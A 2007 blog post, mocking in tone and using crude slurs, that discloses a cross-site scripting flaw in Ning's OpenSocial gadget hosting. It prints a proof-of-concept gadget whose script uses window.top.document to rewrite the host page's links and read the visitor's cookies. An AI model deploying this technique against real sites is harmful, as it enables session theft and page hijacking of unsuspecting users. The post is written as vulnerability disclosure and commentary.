Posted by harold at November 3rd, 2007
Friends. Romans. People with half a brain. It’s finally happened: Google’s opened the floodgates to ubiquitous bad taste, annoyances, and exploits across all social networking platforms, ranging from Ning to MySpace to the Iranian Goat Farmers’ Association. If you’ve been following the tech news lately, you’re probably aware that Google and his merry band of transvestites released the abomination known as the OpenSocial API this past Thursday. I understand that sounds like a pretty rash statement—I do get a rash sometimes—but this time I’m going to back it up with the facts and let you decide, doc.
It all started with a neat little trinket known as Google Gadgets. If you’re the sort of person who doesn’t give a damn about personal privacy, I’m sure you’ve used iGoogle, which allows you to put all kinds of nice little gadgets on your Google home page. OK, even I use it—it’s just way too handy being able to check the weather and gas prices without even stepping outside! But you know, then I got hacking, and things didn’t look so hot anymore… any gadget that you add can run arbitrary JavaScript in your browser, and if you create a gadget using the “html-inline” content mode, it can even radically alter the structure of the iGoogle home page! So I tried that, and boy was I relieved when it gave me an extra little warning that I brashly clicked through to get my widget onto my home page… but hey, whatever I put on my iGoogle is my fault. It’s my customization.
On the other hand, social networks—at least amongst the non-retard/myspace set—very wisely have thus far constrained the format of peoples’ profiles. You get maybe a picture, some work history, and some stupid little details about how the person’s a big loser that nobody cares about. Maybe some trite comments from so-called “friends.” But with OpenSocial…? Perhaps you should take a look at my niece’s handiwork. Sorry, she’s not that stupid, I actually made that page myself (got you back, Berli!). Anyway, you see that little box o’ seizures titled “preaty culrz!”? It’s a Google Gadget in full glory.
But it gets worse than that, friends. That little Google Gadget could actually be a lot nastier than it looks, because it’s an “html-inline” component… when I add it on iGoogle, it makes my whole page background nauseatingly flashy. Ning is actually shielding your eyes by ignoring the fact that it’s an “html-inline” component—and forcing the box o’ seizures to be rendered in an iframe. But wait a minute. Where’s that iframe being loaded from?? Let’s take a gander at the source of Berlinetta’s page:
<iframe id="embeddingFrame" ...
src="/gadgets/index/gadgetWrapper?url=http%3A%2F%2Fhosting.gmodules.com%2Fig%2Fgadgets%2Ffile%2F107691354973556300155%2Fsplendid.xml&ownerName=18wefqtay110x&mode=profile">
</iframe>
Splendid! If you view the source of gadgetWrapper with the url argument, you’ll notice that the code of the Gadget is inserted into the gadgetWrapper page on the server side: Ning fetches the gadget XML from whatever third-party address is in the url parameter and serves its HTML from Ning’s own domain, the very same domain as the profile page (note the relative src). Those Web 2.0 wizards just left the front gates unlocked and well-oiled, ready to be swung right open. Now what if, purely hypothetically, one of Berlinetta’s puckish little friends happened to, oh, push the gate open and walk in? But we don’t have to wonder, we can know.
Yes dudes, that’s right: that innocent looking little gadget purportedly describing a delicious extract of mulberry actually extracts your delicious cookies and rewrites all of the hyperlinks on the page. I could have been more devious about it, but remember, my goal here is merely exposition of how much Web 2.0 sucks. In case you missed it, here’s the link to the page with the exploit, and here’s the exploitive little gadget itself:
<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Splendid!" />
  <Content type="html"><![CDATA[
    <script language="javascript">
      function exploit() {
        var doc = window.top.document;
        var a = doc.getElementsByTagName('a');
        for (var i = 0; i < a.length; i++) {
          if (a[i].hasAttribute('href')) {
            a[i].setAttribute('href',
              'http://www.haroldtherebel.com/2007/11/03/peer-prescience/');
          }
        }
        document.getElementById('done').innerHTML = document.cookie;
      }
    </script>
    <font color="#ffffff"><form>
      <center>Click this button to make all of the links
      on this page go to haroldtherebel.com:<br/>
      <input type="button" onclick="exploit();"
        value="Exploit now!"><br/>
      cook-ease:<br/>
      <textarea id="done" rows="10" cols="60"></textarea></center>
    </form></font>
  ]]></Content>
</Module>
The exploit really speaks for itself, but let me point out the magic line: “var doc = window.top.document;” This says “yeah, I know I’m a measly little iframe, but just forget that and give me access to the whole document.” If the iframe is served from the same origin (scheme, host and port) as the main page, the browser’s same-origin policy has nothing to object to, and it is more than happy to honor that request; had the gadget been served from a separate gadget domain, the same line would have been refused. Hence the gate swings open. The floodgates of antisocial behavior, opened courtesy of OpenSocial. Good job Ning, Google, and everybody else! Rah-rah Web 2.0! Cross-site scripting makes you strong and healthy like a beluga whale!
Yeah, I’m sure that stuff is worth billions. Sorry, I’d put my money on a factory full of slave laborers making tennis shoes in south-east Asia any day.